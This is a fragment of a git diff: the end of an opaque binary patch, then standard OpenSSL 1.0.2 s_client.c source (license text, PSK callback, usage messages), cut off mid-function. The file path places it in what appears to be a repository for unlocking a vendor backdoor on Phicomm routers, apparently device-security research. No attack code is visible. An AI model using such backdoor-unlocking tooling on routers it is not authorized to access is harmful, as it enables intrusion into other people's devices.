zG4d8ID=sba){3XE4S3%LUN6Ki`CiM?shK(6lG36@ZZD16q8xnU8{UJgffoP_@yNQj
zvZicxz>5!-O96Zj5(>fR<jbq;@udwz=n@vnmm%c~7lJNu6}oBO@NbX`f{isI0gs#a
zdcOs$iHu%AgeU3gJx6$br>3SH>Lv@4M(33-6;6R?#NkDQpwQIcarsgStF6i?4#4X!
z@KUBKXKkn&-f<AJ@MJl>-6XWi_fo*S;PTZ<v{yb^24#^iWzx$m5zol?Ii+J<B?~NX
zX@PQ#(NK?1nfn9MPw<k2tPPY1ug?fqq0O4Ry!d8AuY*y)$z$*in({op&miLnHTgsn
z(tDU*d`v!4B<%eAVq=sT!9HwVTp9FTD@YQoZ4gDemlS)8;YB`J9~hA|zWo^8t8Dc9
zMT}L1AX6j=F#Ivt6!5~!2nIqFGvGxT=vZI?zHkze5%%GWHGXPGZ%sWkCWf4Nml5J1
z;EQnxU#jVKs5Y<~-V_!^is}Yy0`NKlqSf%qOCuH{Ur&h^Py6bX5_l=eASB;lF&4QN
z<a@;{ox&)rUn6ucqX^bjU}b)_U-$)v2+I&}2~qDBK2pId-ie783h%=Bz$54kUvLAA
zHbGjiMOrJ;?qEAx&IzR=bVUlrjE4FKuSnO_!>e*~)n|w_4j3|pffPXj16n1ZB%$vJ
zOM;DAm9;^GVgu|7gy5BtMtE_9hB&B+c(V)l^Tex^5X-QzWc%nE@vf1|6Bz--D=-mN
z_yS9>@kJN}wUo+=7R>efYAY~!)``K<za9q28VFvfZ75JB?H9g-(I=V*I}o~!yc#_K
z%Az|cC0|&HxL>V}r4Sq!F$~^=*b<9n{EMnX5bKRK-U@h45#1>i2)_!s03YP){OkFy
zkW#PO^b!<pCr=E{pz{MfpMM2DKf@0m;O1fcRmRUJj;D=y-lOEJh@+m@7;k3$b;frP
zM?FIs{~d8%&pk{YFIlK^AC4ivhsoo)yORHk$@6-t>s44Tw=+dN2ZGON%6AZyo>bzx
zofDZnUTRSCa~Q{GB^57V98dWbm(NGxv#o}K&%!BQ#^mu7UUB)nQ(yTFB#(ODWb&Jt
zo)a10#^iaqH!^uV<yYnIj3F<dFOq&6$>bkn@;pusGX55m|BjVAig9)Q59{?d<La4w
z<nJ&ppQDied6)6~==ulBzsLB?jK9ygd`>{t>jTDzi2I&W|A&kZCyweqVth2?c*#Qf
za~#vd{h!JB$4q`Y)5G=4`~K3NPnf*C?=S7=^76ia-}YL@%H{2KevEPhjGxTPy@YYR
zG@<I-!nnz}ykFlpo^N9EW0?FM#IYT@-yUZCFq40t=^4xTi;SPj_&ZDw_rqZ(pT^|B
zVe;Ib0cap>_|*v?<%bl;KV^Iz<J^9Ee_86`yp_p+#`IjpI6f1r%Ds{CFBrd-IL0mh
z&e%_KTIkuuIFFydFrLoz$or~&+fhAlhx$)r@^3JEc$~k_^z(A%eNw5P$GN;u+Bcr%
zebT=1KOhl|fDMb`?W>+!LXLBX@>?p&>-~BR<Kvk88B9Nqhb$)lHItvgI6eb?g#15`
zaeRhZwF}<&#0~A?^6L32<ZuZyV*d?H{v*b3VLXHJoy2wj+`~BD(@_3-km>n|@xL;8
z-d+b{$RA{UB-8UU)5F{AZ6^N_lmCeE@r<kI{IFiUUDT@=dixHd`)bHfXL=mObv<L4
zJhw+Ze}?kkGd&Yy$WLLM`{Aq@<>oPY-hT@j=l0-zSlrN_AK;_f(a+?$o_fZ)p7k;G
zv@m(DXFKCu&kc;@8dceI3)9cr>lMb2F!}eGo(YWq%;f*Yc=90FfeqVtB79W2LmB6G
zs^{?Zb{`u<ejIU>?`HZf#(!e`>==6HGCqmP7cxEEKie7qg~?yX^qk4~P9~4{5R@P8
zWAd4d?_!+$=dVl;uh+pC@~<$?>-9F%!|T<}cn`BDE(vyE!*;abqwF6;9R1JbEheAE
z<g*#)^_s=>aC`D&$a|PPZ+G?lAKJsuzwTu6hnYR<IX|q|WXAU~c|IPh=krj03X@NT
z`;xdJp9&x4pR*XB#<<P+bjHtPd?e%QxjL*Dw?{o!hn&|7@6Y0foS&!M#q?*xF=gk&
zOrHDydB*v9#EVQ%4%370-{FRSm;oQ9|0BlFV*CrnXEOdH<FgpY`@FcJ{@L(R`jd(4
z{=xgaxak~zuT5;I=WO^WJr<MaerREw`&m72hkA0Eo*S4vZ?D@J$8%&=?w=V?VEi%S
zsNco(?~5V-9Fw2J<X>U(yk74zK7f_`J>$IHPlfxKxS>DsCoz@%^NFLKdGJxZhVgvH
z*D*cZo)*UOUcJ)uTc*d&^gPb^T*mh@K96zroE+MJ4AcK6led}t_ly@Xew6WZ7#}nQ
zc3?yO$xQ!n#_?S?Rj;wc(QkY_%w&8%98>ZIOb@regvooDyf=n?HIpx7@&U%VJ=Zdh
z@2Dz!b}(MV_+5+_GyWjs3mJc%@kNY(&Ugvq>XlmbTPfp1kA)rBkn?g=8OLWyl>L(!
zU&6SH@pBnpz&J1WJjRzYc|YS^zLjz8YB=}fwvBPFX9wfFUOO3I2KiOJ?q_^C;}0{w
zg7J?SU&;6p##b@k!#LMJ%mG5Mq5sc=kFw_!#<~5cG45sZXEM&^r!js$lRukrE<cy?
zGA3WdIG10-csY~zGS1~I8TT>ydd9i@I>sxQ{AR|v{8q;OO#Vv7D;a-?ajxe@##b}>
z4;bh2M;PaE+rxMj(=*ZuJFsE9V?1LX+$Jzy4f`q{vKhaC@qEVDFkZ}f4dW{ruVviN
zcpc+)jMp>1p7938n;2iqc$o1<#;;+V`{&n;bASGp@c`5F0OLW%pJbfNKf`#4$-m6_
zI>z5*oZI;+<LjCH5#l(n@%egS3IN!!-8aBTweN7^y8KB@ej}65iXlIn$zRCi=f{vg
zm&uQ0@?|mPw=nsOnEdsOU(ERJjC1+B7{7$c?_+!u<Igd^neo>dZ({s=#<73>9zM7o
zGgN+~|F^(L`Tsb^x&Bd%^Kp9?<EUTV=UB-2rA&V%<IRk(W1Q>1l<^iOzn$?`#&2YN
zE8}-Cei`ErFn&4Xdl(Nh{w(8HF#b=*+ZcbJ@okKM!FW64-HdN%JYg8@z=rL0C45wS
z4PpE$#*btCYQ|4y{2Io`G5#yYGa0{@@f^mlV|)(d*E2q!@&94Gl<^xFU&T0&hf2nO
z&E)GDzmf3`jQ@u5&5ZLn|1IM;G5KALW1K$%YjNBTFunu!RlB^*IM?$Y<2N(;ZpLq6
zJZ?Dbz=rM4^$cbFRyd~09nJV{jE`shw~S{oemmo5F}{=We8zvrcp>9=FusKGI~n&f
zj$@Ltzl!lcFus=YyBNQa@w*vsX8az;w=sS%<JU3%N5*ev{65C-Wc+@{?`Ql^jQ@r4
z2N>Va_=AkUOkAG_KVY1n=Vpw6%&=jc;JtEnKVmxL_?sun&ohame*7nRil4*e`FY$z
z#{Ud?l>Abr=MBbvOdjn~_f0}femE;P%=od4-@)`e#PmPF_$bDAGd&}io~L8Tzrf_*
zW_sRY^4t#}GQNw+f5G%{KV%*ULa<@GaQkO6&h2**$9CcN&t?2LR<8=ChqrG%lgEE$
zs@iKk<M>-Qir>jNzi#su)6e7TJ0{QDG3j`$t-OxG+cBNE?gxu;?uQ(vhx@@DL%xv7
z^LAXx<as;#7~ci<DnDGn^ze54Ba?rK$?s;I+y4a9!|mV4IB&=InI7JbpEG&hj^8uR
z+tG0XdSCkgMAp7%FwWbzigEmnBjty6jPvVzTZx|zWpMd6CVw*1^FNGpI}b8GiphUK
z9OL9+_$Yh6W&9Dwe_?ufdmWPsLa?EpN8zLN98Vnkm&wX4Wqb_dO-#>jrso<aKbFZ4
zJrRUp!*U;kk1F>R#vf;V9C5TKjp<p;<p09tS21~B-}Ov>50l@_<hlN9nfwz>{%*!Q
z7=JK^p1(8sCz<?fOrG2M9h3hnlmD5?b2~?$1VXT(Klj2%`7@ok?zddVyP5nsjPrOa
zV?3StzlJ!LyN~G!GI?(2Rg7~zFEP&h-SCm16gISf94mJ;aV+;K_^A4hWAfaeXEOc@
zleZZ^%y@YWUQHa!eVWOyWAd*tzMXOWty^X14yFgEM8$u{<hh;)7$48{>|uIvy=|jm
zupMIZe0+P0$?pd_RqjVjo|pRtlYfTE|0{;P`f+14;{cOC1qXfDupQrkk1BU6ag;}u
ziqB&5+#WaMr!zkkGS2-|%Je_W^p`PtZqGW#&tUpnnV#pEo^~eB?YxfhkD2_PjDN!T
zADMpchh0pb>wlJU9=ESD{wCA^4srDJ^NfGS<hdWdW1P=lzc4+2V|o%t!wziNzTD1Z
z8Rz|O6ytHs&lclvfi4vfYZ=F9Ru#XTIM(Y0CVvf+=k?mj<cpd7pBVo;<B!GA^E%^`
zm_45{JqMYd@0dLI&r!zlHxE_4jy)MN!-oFkJcIFWIHu$)7`K?78phvY@|zfcm+@^e
z_-}}#pZ~$+?`HCRoIk*L7PIGVric6gFyq|+-!MJA9e-h*`(gMgU>t0^ohLDV2#zbi
zjU|qL=5~%}@-H&^sZ4${t5+VAe~HP@XY#z=OBm<&H#0t!>A!{XX^g+kcsAo-GM>Zu
zNhTNv8`if6KFSZ{P1u1AIoChiL@GJgzt9v|$aDR*jC1`>jL%^9w8!8xhD7!AcHa_%
zUzie==jT)ZV%GsUpU>9ABbhx?i;N$Pq3aT(dNG9zKdT1f9{j$w{EF~0;$&uotLM_l
z%m~Nd4Z)30izB?2I4z$ed@XSrh9mq(veOjWqIQlZ`817RLOes`TZm84xO$E-Q{(FS
zzbP8O_gD$CHGVVknHo=XNRX@XY~uME_Yk)=em-%J#)HI*HGVnqQjOn4e5u9{IVD)B
z@rlIG*Z3^r6&f!jUZwF{h}UTRcH#{hzms@S<98F^pz-^NU##&5i8pEdVd5<s-$?v&
zjjQ{1+cbVX$zP>$Rj+F`em}|Ipz*&Dze(dS62DdBuMpp<@i&P7UgQ5Hevifn(*1_}
zHQqqiqyMb&%SiqajjQYOk8At_($k^wI^z2@-bnlzjjtpAyv8pieo*6^h`*%q2g&|d
zHNKVP-_-aO#NXBUcH$pu{2JniHGVzu&oq7`@vk&~Gx6^<uI^79(fA!C|FgzFq58s4
zT8K@J^M54y0UG~_<dZZ$nB<3Od?azaHi(<je+F^9_Qm;G#8Wk{?hoO)IhS8S@_4O=
z^EJeAZN|B}--G9*oVSwv1dYE=JX7Ou6Q82-_le`0f$RU6_)Lv|N<3HNUl7mN_&3CD
zjsHO0qwxob7i;_|@luV))4E})#s?B#sqtju=WE<Syh7u{h*xR+c;Yo0KZ$sQ#!n_5
z)c6NfuMHaiiulDEUqJEPr1A4ezD48Z#4p#l8sD~QT#av6X<UtO*J@miZ#QUMjc+$;
zT#awHYJ3yfxl`k9#DA~xWyJ5%xT@Fv8V`{CpEce@{1J_}6MtOeJE<KzH2y5f@6))7
zlV>!38tHjn<I{*A)Oa58mo#2X{8f#wBL1evFChM|#@7@7P~$Dc4{Q8t;-6_;-Cz7l
z<9Cz%cN%|$_z{giMf_)ttNthkW*D&4_^kXq00HBwKdS$KpyXA59HPmOrE*g={w47d
z8b6)5`hQVM|0Lq0G<kJ@+SIse_cV>qAUzoxpG|y%#^(^v)c9QDQ#5`KarOVK@GyQB
z5LdtBrT8M^xtg9O#Pc=2oVdE)sq~yY0$VA1UWUz#r$z}wkjnpqhTn>hAfAB`HpSD4
zXG<L6S;TFPpG|zJ#upN=(zuWK290kbe!0f4AZ`*@^`%|o292wJrLRj{$dB)8^6LNj
zOwjs;`rXPZjjP{l)W>c0dy4uvqkacbk6ZOSh<ZGz-!GKEKOgOn>h}m=)#5?@j$m4X
zteEnT`n^E)e=ihQzZbYulUKjDcSPgrclCx0=&fJ<exCdt=BS<O_wa(6y!sux4vnkd
zr5i%$@ybs1`*0qOtKW6w??qxB^?Pg`n!NgbHDgj>V{Ndk9KM5%^1Di<8vQk8lkk6&
z8j~vEe{ma=$^!voQe!>tpg8<DbJ#^8$!JF$20RIWyP?LIg#Snte$&R71pi~(KMDRh
z;zaS&KD58OE;I@L)o=s+bi_td;ID#T=fHnO`oFN5paVmdE@MPA=2GfjGlE2d!a4#+
zLJFHEH$r40<9zvjey04!(?rahBzMLCSH$FL@Ig-DgGg+jo0QPL^ztXbanz~j|H_mZ
zX?T-6@R!0UvTs2Ob!J6~OsM?7p>aeVR^_X2Hypq;#uDGQO_X~@+5x@%ToCKef0th+
z^FKq^f6#x}M!NqN0mJh3`oDW7K-g{-f1`iQXi}sK;ctKC7vC%eUnO}gAIsLuF9(L@
zQ!_(KZcPNvP=LOb-_-XS;3~~U@75J+`IYQNkQf9X&CSOBl;2c>^sVey_*am?^7Z@&
zRry-S(DQGHy#4tv;}%&$E-6O;VN<I7sq%2YW#gfP)1-j9Uy}m6|Add8{}^C;+hfk9
grTEt{o*gW|)nDD$cpB4R{;Jz#jvXo^ee3!EA75+9f&c&j

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/s_client.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/s_client.c
new file mode 100644
index 0000000..b1152aa
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/s_client.c
@@ -0,0 +1,2324 @@
+/* apps/s_client.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+/* ====================================================================
+ * Copyright 2005 Nokia. All rights reserved.
+ *
+ * The portions of the attached software ("Contribution") is developed by
+ * Nokia Corporation and is licensed pursuant to the OpenSSL open source
+ * license.
+ *
+ * The Contribution, originally written by Mika Kousa and Pasi Eronen of
+ * Nokia Corporation, consists of the "PSK" (Pre-Shared Key) ciphersuites
+ * support (see RFC 4279) to OpenSSL.
+ *
+ * No patent licenses or other rights except those expressly stated in
+ * the OpenSSL open source license shall be deemed granted or received
+ * expressly, by implication, estoppel, or otherwise.
+ *
+ * No assurances are provided by Nokia that the Contribution does not
+ * infringe the patent or other intellectual property rights of any third
+ * party or that the license provides you with all the necessary rights
+ * to make use of the Contribution.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. IN
+ * ADDITION TO THE DISCLAIMERS INCLUDED IN THE LICENSE, NOKIA
+ * SPECIFICALLY DISCLAIMS ANY LIABILITY FOR CLAIMS BROUGHT BY YOU OR ANY
+ * OTHER ENTITY BASED ON INFRINGEMENT OF INTELLECTUAL PROPERTY RIGHTS OR
+ * OTHERWISE.
+ */
+
+#include <assert.h>
+#include <ctype.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <openssl/e_os2.h>
+#ifdef OPENSSL_NO_STDIO
+# define APPS_WIN16
+#endif
+
+/*
+ * With IPv6, it looks like Digital has mixed up the proper order of
+ * recursive header file inclusion, resulting in the compiler complaining
+ * that u_int isn't defined, but only if _POSIX_C_SOURCE is defined, which is
+ * needed to have fileno() declared correctly...  So let's define u_int
+ */
+#if defined(OPENSSL_SYS_VMS_DECC) && !defined(__U_INT)
+# define __U_INT
+typedef unsigned int u_int;
+#endif
+
+#define USE_SOCKETS
+#include "apps.h"
+#include <openssl/x509.h>
+#include <openssl/ssl.h>
+#include <openssl/err.h>
+#include <openssl/pem.h>
+#include <openssl/rand.h>
+#include <openssl/ocsp.h>
+#include <openssl/bn.h>
+#ifndef OPENSSL_NO_SRP
+# include <openssl/srp.h>
+#endif
+#include "s_apps.h"
+#include "timeouts.h"
+
+#if (defined(OPENSSL_SYS_VMS) && __VMS_VER < 70000000)
+/* FIONBIO used as a switch to enable ioctl, and that isn't in VMS < 7.0 */
+# undef FIONBIO
+#endif
+
+#if defined(OPENSSL_SYS_BEOS_R5)
+# include <fcntl.h>
+#endif
+
+#undef PROG
+#define PROG    s_client_main
+
+/*
+ * #define SSL_HOST_NAME "www.netscape.com"
+ */
+/*
+ * #define SSL_HOST_NAME "193.118.187.102"
+ */
+#define SSL_HOST_NAME   "localhost"
+
+/* no default cert. */
+/*
+ * #define TEST_CERT "client.pem"
+ */
+
+#undef BUFSIZZ
+#define BUFSIZZ 1024*8
+
+extern int verify_depth;
+extern int verify_error;
+extern int verify_return_error;
+extern int verify_quiet;
+
+#ifdef FIONBIO
+static int c_nbio = 0;
+#endif
+static int c_Pause = 0;
+static int c_debug = 0;
+#ifndef OPENSSL_NO_TLSEXT
+static int c_tlsextdebug = 0;
+static int c_status_req = 0;
+#endif
+static int c_msg = 0;
+static int c_showcerts = 0;
+
+static char *keymatexportlabel = NULL;
+static int keymatexportlen = 20;
+
+static void sc_usage(void);
+static void print_stuff(BIO *berr, SSL *con, int full);
+#ifndef OPENSSL_NO_TLSEXT
+static int ocsp_resp_cb(SSL *s, void *arg);
+#endif
+static BIO *bio_c_out = NULL;
+static BIO *bio_c_msg = NULL;
+static int c_quiet = 0;
+static int c_ign_eof = 0;
+static int c_brief = 0;
+
+#ifndef OPENSSL_NO_PSK
+/* Default PSK identity and key */
+static char *psk_identity = "Client_identity";
+/*
+ * char *psk_key=NULL; by default PSK is not used
+ */
+
+static unsigned int psk_client_cb(SSL *ssl, const char *hint, char *identity,
+                                  unsigned int max_identity_len,
+                                  unsigned char *psk,
+                                  unsigned int max_psk_len)
+{
+    unsigned int psk_len = 0;
+    int ret;
+    BIGNUM *bn = NULL;
+
+    if (c_debug)
+        BIO_printf(bio_c_out, "psk_client_cb\n");
+    if (!hint) {
+        /* no ServerKeyExchange message */
+        if (c_debug)
+            BIO_printf(bio_c_out,
+                       "NULL received PSK identity hint, continuing anyway\n");
+    } else if (c_debug)
+        BIO_printf(bio_c_out, "Received PSK identity hint '%s'\n", hint);
+
+    /*
+     * lookup PSK identity and PSK key based on the given identity hint here
+     */
+    ret = BIO_snprintf(identity, max_identity_len, "%s", psk_identity);
+    if (ret < 0 || (unsigned int)ret > max_identity_len)
+        goto out_err;
+    if (c_debug)
+        BIO_printf(bio_c_out, "created identity '%s' len=%d\n", identity,
+                   ret);
+    ret = BN_hex2bn(&bn, psk_key);
+    if (!ret) {
+        BIO_printf(bio_err, "Could not convert PSK key '%s' to BIGNUM\n",
+                   psk_key);
+        if (bn)
+            BN_free(bn);
+        return 0;
+    }
+
+    if ((unsigned int)BN_num_bytes(bn) > max_psk_len) {
+        BIO_printf(bio_err,
+                   "psk buffer of callback is too small (%d) for key (%d)\n",
+                   max_psk_len, BN_num_bytes(bn));
+        BN_free(bn);
+        return 0;
+    }
+
+    psk_len = BN_bn2bin(bn, psk);
+    BN_free(bn);
+    if (psk_len == 0)
+        goto out_err;
+
+    if (c_debug)
+        BIO_printf(bio_c_out, "created PSK len=%d\n", psk_len);
+
+    return psk_len;
+ out_err:
+    if (c_debug)
+        BIO_printf(bio_err, "Error in PSK client callback\n");
+    return 0;
+}
+#endif
+
+static void sc_usage(void)
+{
+    BIO_printf(bio_err, "usage: s_client args\n");
+    BIO_printf(bio_err, "\n");
+    BIO_printf(bio_err, " -host host     - use -connect instead\n");
+    BIO_printf(bio_err, " -port port     - use -connect instead\n");
+    BIO_printf(bio_err,
+               " -connect host:port - who to connect to (default is %s:%s)\n",
+               SSL_HOST_NAME, PORT_STR);
+    BIO_printf(bio_err,
+               " -verify_host host - check peer certificate matches \"host\"\n");
+    BIO_printf(bio_err,
+               " -verify_email email - check peer certificate matches \"email\"\n");
+    BIO_printf(bio_err,
+               " -verify_ip ipaddr - check peer certificate matches \"ipaddr\"\n");
+
+    BIO_printf(bio_err,
+               " -verify arg   - turn on peer certificate verification\n");
+    BIO_printf(bio_err,
+               " -verify_return_error - return verification errors\n");
+    BIO_printf(bio_err,
+               " -cert arg     - certificate file to use, PEM format assumed\n");
+    BIO_printf(bio_err,
+               " -certform arg - certificate format (PEM or DER) PEM default\n");
+    BIO_printf(bio_err,
+               " -key arg      - Private key file to use, in cert file if\n");
+    BIO_printf(bio_err, "                 not specified but cert file is.\n");
+    BIO_printf(bio_err,
+               " -keyform arg  - key format (PEM or DER) PEM default\n");
+    BIO_printf(bio_err,
+               " -pass arg     - private key file pass phrase source\n");
+    BIO_printf(bio_err, " -CApath arg   - PEM format directory of CA's\n");
+    BIO_printf(bio_err, " -CAfile arg   - PEM format file of CA's\n");
+    BIO_printf(bio_err,
+               " -reconnect    - Drop and re-make the connection with the same Session-ID\n");
+    BIO_printf(bio_err,
+               " -pause        - sleep(1) after each read(2) and write(2) system call\n");
+    BIO_printf(bio_err,
+               " -prexit       - print session information even on connection failure\n");
+    BIO_printf(bio_err,
+               " -showcerts    - show all certificates in the chain\n");
+    BIO_printf(bio_err, " -debug        - extra output\n");
+#ifdef WATT32
+    BIO_printf(bio_err, " -wdebug       - WATT-32 tcp debugging\n");
+#endif
+    BIO_printf(bio_err, " -msg          - Show protocol messages\n");
+    BIO_printf(bio_err, " -nbio_test    - more ssl protocol testing\n");
+    BIO_printf(bio_err, " -state        - print the 'ssl' states\n");
+#ifdef FIONBIO
+    BIO_printf(bio_err, " -nbio         - Run with non-blocking IO\n");
+#endif
+    BIO_printf(bio_err,
+               " -crlf         - convert LF from terminal into CRLF\n");
+    BIO_printf(bio_err, " -quiet        - no s_client output\n");
+    BIO_printf(bio_err,
+               " -ign_eof      - ignore input eof (default when -quiet)\n");
+    BIO_printf(bio_err, " -no_ign_eof   - don't ignore input eof\n");
+#ifndef OPENSSL_NO_PSK
+    BIO_printf(bio_err, " -psk_identity arg - PSK identity\n");
+    BIO_printf(bio_err, " -psk arg      - PSK in hex (without 0x)\n");
+# ifndef OPENSSL_NO_JPAKE
+    BIO_printf(bio_err, " -jpake arg    - JPAKE secret to use\n");
+# endif
+#endif
+#ifndef OPENSSL_NO_SRP
+    BIO_printf(bio_err,
+               " -srpuser user     - SRP authentification for 'user'\n");
+    BIO_printf(bio_err, " -srppass arg      - password for 'user'\n");
+    BIO_printf(bio_err,
+               " -srp_lateuser     - SRP username into second ClientHello message\n");
+    BIO_printf(bio_err,
+               " -srp_moregroups   - Tolerate other than the known g N values.\n");
+    BIO_printf(bio_err,
+               " -srp_strength int - minimal length in bits for N (default %d).\n",
+               SRP_MINIMAL_N);
+#endif
+    BIO_printf(bio_err, " -ssl2         - just use SSLv2\n");
+#ifndef OPENSSL_NO_SSL3_METHOD
+    BIO_printf(bio_err, " -ssl3         - just use SSLv3\n");
+#endif
+    BIO_printf(bio_err, " -tls1_2       - just use TLSv1.2\n");
+    BIO_printf(bio_err, " -tls1_1       - just use TLSv1.1\n");
+    BIO_printf(bio_err, " -tls1         - just use TLSv1\n");
+    BIO_printf(bio_err, " -dtls1        - just use DTLSv1\n");
+    BIO_printf(bio_err, " -fallback_scsv - send TLS_FALLBACK_SCSV\n");
+    BIO_printf(bio_err, " -mtu          - set the link layer MTU\n");
+    BIO_printf(bio_err,
+               " -no_tls1_2/-no_tls1_1/-no_tls1/-no_ssl3/-no_ssl2 - turn off that protocol\n");
+    BIO_printf(bio_err,
+               " -bugs         - Switch on all SSL implementation bug workarounds\n");
+    BIO_printf(bio_err,
+               " -serverpref   - Use server's cipher preferences (only SSLv2)\n");
+    BIO_printf(bio_err,
+               " -cipher       - preferred cipher to use, use the 'openssl ciphers'\n");
+    BIO_printf(bio_err,
+               "                 command to see what is available\n");
+    BIO_printf(bio_err,
+               " -starttls prot - use the STARTTLS command before starting TLS\n");
+    BIO_printf(bio_err,
+               "                 for those protocols that support it, where\n");
+    BIO_printf(bio_err,
+               "                 'prot' defines which one to assume.  Currently,\n");
+    BIO_printf(bio_err,
+               "                 only \"smtp\", \"pop3\", \"imap\", \"ftp\" and \"xmpp\"\n");
+    BIO_printf(bio_err, "                 are supported.\n");
+#ifndef OPENSSL_NO_ENGINE
+    BIO_printf(bio_err,
+               " -engine id    - Initialise and use the specified engine\n");
+#endif
+    BIO_printf(bio_err, " -rand file%cfile%c...\n", LIST_SEPARATOR_CHAR,
+               LIST_SEPARATOR_CHAR);
+    BIO_printf(bio_err, " -sess_out arg - file to write SSL session to\n");
+    BIO_printf(bio_err, " -sess_in arg  - file to read SSL session from\n");
+#ifndef OPENSSL_NO_TLSEXT
+    BIO_printf(bio_err,
+               " -servername host  - Set TLS extension servername in ClientHello\n");
+    BIO_printf(bio_err,
+               " -tlsextdebug      - hex dump of all TLS extensions received\n");
+    BIO_printf(bio_err,
+               " -status           - request certificate status from server\n");
+    BIO_printf(bio_err,
+               " -no_ticket        - disable use of RFC4507bis session tickets\n");
+    BIO_printf(bio_err,
+               " -serverinfo types - send empty ClientHello extensions (comma-separated numbers)\n");
+#endif
+#ifndef OPENSSL_NO_NEXTPROTONEG
+    BIO_printf(bio_err,
+               " -nextprotoneg arg - enable NPN extension, considering named protocols supported (comma-separated list)\n");
+#endif
+    BIO_printf(bio_err,
